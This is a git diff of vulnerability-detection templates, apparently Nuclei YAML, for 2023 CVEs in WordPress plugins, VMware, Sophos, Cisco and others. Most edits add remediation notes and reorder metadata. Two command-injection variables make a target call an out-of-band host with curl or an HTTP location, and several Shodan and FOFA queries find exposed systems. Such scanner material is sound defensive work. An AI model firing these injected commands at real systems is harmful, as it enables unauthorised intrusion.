- https://nvd.nist.gov/vuln/detail/CVE-2023-0968 - https://www.wordfence.com/threat-intel/vulnerabilities/id/6341bdcc-c99f-40c3-81c4-ad90ff19f802 - remediation: Fixed in version 3.3.9.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 epss-score: 0.00283 - cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* epss-percentile: 0.64533 + cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: kibokolabs product: watu_quiz + framework: wordpress tags: wordpress,cve,cve2023,wp,wp-plugin,xss,watu,authenticated,wpscan http: diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index be84fef3d0..69e1151000 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. + remediation: | + Update to the latest version of the Steveas WP Live Chat Shoutbox plugin (1.4.2) or apply the vendor-provided patch to fix the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff - https://wordpress.org/plugins/wp-shoutbox-live-chat/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-1020 cwe-id: CWE-89 epss-score: 0.06484 - cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* epss-percentile: 0.92801 + cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: wp_live_chat_shoutbox_project product: wp_live_chat_shoutbox + framework: wordpress tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat http: diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 9de25d9e09..1690769b75 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -6,27 +6,27 @@ info: severity: medium description: | WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.5.6. reference: - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74 - https://wordpress.org/plugins/gn-publisher/ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57 - https://nvd.nist.gov/vuln/detail/CVE-2023-1080 - https://plugins.trac.wordpress.org/browser/gn-publisher/trunk/templates/settings.php#L70 - remediation: Fixed in version 1.5.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 epss-score: 0.00283 - cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* epss-percentile: 0.64533 + cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: gnpublisher product: gn_publisher + framework: wordpress tags: wp-plugin,wordpress,gn-publisher,authenticated,cve2023,wp,xss,wpscan,cve http: diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 1f50185e5f..4555a12e53 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \..\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability. reference: - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/ - https://github.com/mlflow/mlflow/commit/7162a50c654792c21f3e4a160eb1a0e6a34f6e6e @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-1177 cwe-id: CWE-29 epss-score: 0.01497 - cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* epss-percentile: 0.85238 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.title:"mlflow" verified: true + max-request: 3 vendor: lfprojects product: mlflow + shodan-query: http.title:"mlflow" tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive http: diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index 3a787e038c..8ef85eb9ab 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2. + remediation: | + Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-1362 - https://huntr.dev/bounties/e5959166-c8ef-4ada-9bb1-0ff5a9693bac/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-1362 cwe-id: CWE-1021 epss-score: 0.00071 - cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* epss-percentile: 0.29038 + cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: bumsys_project product: bumsys tags: cve,cve2023,bumsys,clickjacking,huntr diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index aa7ecc08df..287c6fe3a6 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434 @@ -13,8 +15,8 @@ info: cve-id: CVE-2023-1434 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Odoo" tags: cve,cve2023,odoo,xss diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 5e70e362a8..b97f01e3d5 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. + remediation: | + Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor. reference: - https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master - https://nvd.nist.gov/vuln/detail/CVE-2023-1454 @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-1454 cwe-id: CWE-89 epss-score: 0.03351 - cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* epss-percentile: 0.90132 + cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: http.favicon.hash:1380908726 + max-request: 1 vendor: jeecg product: jeecg-boot + shodan-query: http.favicon.hash:1380908726 tags: cve,cve2023,jeecg,sqli http: diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 19f0264ff5..4feab5de92 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. + remediation: | + Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability. reference: - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689 - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2 @@ -14,14 +16,14 @@ info: cve-id: CVE-2023-1496 cwe-id: CWE-79 epss-score: 0.0007 - cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* epss-percentile: 0.28688 + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: "Server: imgproxy" + max-request: 1 vendor: evilmartians product: imgproxy + shodan-query: "Server: imgproxy" tags: huntr,cve,cve2023,imgproxy,xss,svg http: diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 5b7bc71254..fde98b4101 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. + remediation: Fixed in version 2.124 reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 - https://nvd.nist.gov/vuln/detail/CVE-2023-1546 - remediation: Fixed in version 2.124 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-1546 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29093 + cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: plainviewplugins product: mycryptocheckout + framework: wordpress tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated http: diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 1fcfc4ac58..15c99c09d5 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code. + remediation: | + Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability. reference: - https://vulncheck.com/blog/cve-2023-1671-analysis - https://nvd.nist.gov/vuln/detail/CVE-2023-1671 @@ -17,15 +19,15 @@ info: cve-id: CVE-2023-1671 cwe-id: CWE-77 epss-score: 0.31251 - cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* epss-percentile: 0.96403 + cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Sophos Web Appliance" - fofa-query: title="Sophos Web Appliance" + max-request: 1 vendor: sophos product: web_appliance + shodan-query: title:"Sophos Web Appliance" + fofa-query: title="Sophos Web Appliance" tags: packetstorm,cve,cve2023,rce,sophos,oast http: diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index ca2c9c7950..15ec6ce3b3 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise. + remediation: | + Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1698 @@ -16,13 +18,13 @@ info: cve-id: CVE-2023-1698 cwe-id: CWE-78 epss-score: 0.59767 - cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.97319 + cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"/wbm/" html:"wago" vendor: wago product: compact_controller_100_firmware + shodan-query: html:"/wbm/" html:"wago" tags: cve,cve2023,wago,rce http: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index faf56c185d..9f3e49ee50 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + remediation: Fixed in version 3.1.5 reference: - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 - https://wordpress.org/plugins/supportcandy/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 - remediation: Fixed in version 3.1.5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 epss-score: 0.06484 - cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* epss-percentile: 0.92801 + cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: "true" - framework: wordpress + max-request: 1 vendor: supportcandy product: supportcandy + framework: wordpress tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth http: diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index db613b42cd..30954cf750 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341 - https://wordpress.org/plugins/ninja-forms/advanced/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-1835 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29093 + cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: ninjaforms product: ninja_forms + framework: wordpress tags: wpscan,cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss http: diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 37a8665942..9e09513484 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.0.9. reference: - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d - https://wordpress.org/plugins/tablesome/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1890 - remediation: Fixed in version 1.0.9. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-1890 cwe-id: CWE-79 epss-score: 0.00157 - cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* epss-percentile: 0.5154 + cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: pauple product: tablesome + framework: wordpress tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome http: diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 59182f4869..116207bde0 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. + remediation: | + Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: - https://unsafe.sh/go-173464.html - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-20073 cwe-id: CWE-434 epss-score: 0.55732 - cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.97213 + cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: - fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" - max-request: 3 - product: rv340_firmware - vendor: cisco verified: true + max-request: 3 + vendor: cisco + product: rv340_firmware + fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive variables: html_comment: "" # Random string as HTML comment to append in response body diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 4972e3da54..adcd654c54 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.7.3 reference: - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 - https://wordpress.org/plugins/custom-404-pro/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 - remediation: Fixed in version 3.7.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 epss-score: 0.00171 - cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* epss-percentile: 0.535 + cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: kunalnagar product: custom_404_pro + framework: wordpress tags: wpscan,cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive http: diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 0668b84b1c..95982b0f2a 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root. + remediation: | + Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0007.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20864 @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-20864 cwe-id: CWE-502 epss-score: 0.10253 - cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* epss-percentile: 0.94193 + cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"vRealize Log Insight" verified: true + max-request: 2 vendor: vmware product: aria_operations_for_logs + shodan-query: title:"vRealize Log Insight" tags: cve,cve2023,vmware,aria,rce,oast http: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 35c75695b4..2a6848cd24 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -7,6 +7,8 @@ info: description: | VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ @@ -18,15 +20,15 @@ info: cve-id: CVE-2023-20887 cwe-id: CWE-77 epss-score: 0.96066 - cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* epss-percentile: 0.99263 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"VMware vRealize Network Insight" - fofa-query: title="VMware vRealize Network Insight" + max-request: 1 vendor: vmware product: vrealize_network_insight + shodan-query: title:"VMware vRealize Network Insight" + fofa-query: title="VMware vRealize Network Insight" tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 090dc83153..1576dc2cbd 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution. + remediation: | + Apply the latest security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20888 @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-20888 cwe-id: CWE-502 epss-score: 0.0799 - cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* epss-percentile: 0.93437 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true - shodan-query: title:"VMware Aria Operations" max-request: 2 vendor: vmware product: vrealize_network_insight + shodan-query: title:"VMware Aria Operations" tags: cve,cve2023,vmware,aria,rce,authenticated,oast http: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 55159124e1..eb0cf15ee9 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.zerodayinitiative.com/advisories/ZDI-23-842/ - https://www.vmware.com/security/advisories/VMSA-2023-0012.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-20889 cwe-id: CWE-77 epss-score: 0.02153 - cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* epss-percentile: 0.87886 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true - shodan-query: title:"VMware Aria Operations" max-request: 2 vendor: vmware product: vrealize_network_insight + shodan-query: title:"VMware Aria Operations" tags: cve,cve2023,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: payload: location='http://{{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index 7f5efdd9b9..ce24d89344 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.0.27 reference: - https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78 - https://wordpress.org/plugins/image-optimizer-wd/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2122 - remediation: Fixed in version 1.0.27 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2122 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29286 + cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: "true" - framework: wordpress + max-request: 2 vendor: 10web product: image_optimizer + framework: wordpress tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated http: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index be769e69aa..654d46910c 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/zitozito1/bug_report/blob/main/SQLi.md - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html @@ -18,11 +20,11 @@ info: cve-id: CVE-2023-2130 cwe-id: CWE-89 epss-score: 0.01557 - cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.85582 + cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system tags: cve,cve2023,sqli,purchase-order-management-system diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index e362f0e3bf..f2da8bc885 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + remediation: | + Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb - https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* epss-percentile: 0.32486 + cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: aajoda product: aajoda_testimonials + framework: wordpress tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated http: diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 3e56431e69..c24c0125b0 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -6,6 +6,8 @@ info: severity: high description: | KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds. + remediation: | + Upgrade KubePi to a version higher than v1.6.4 to mitigate the vulnerability. reference: - 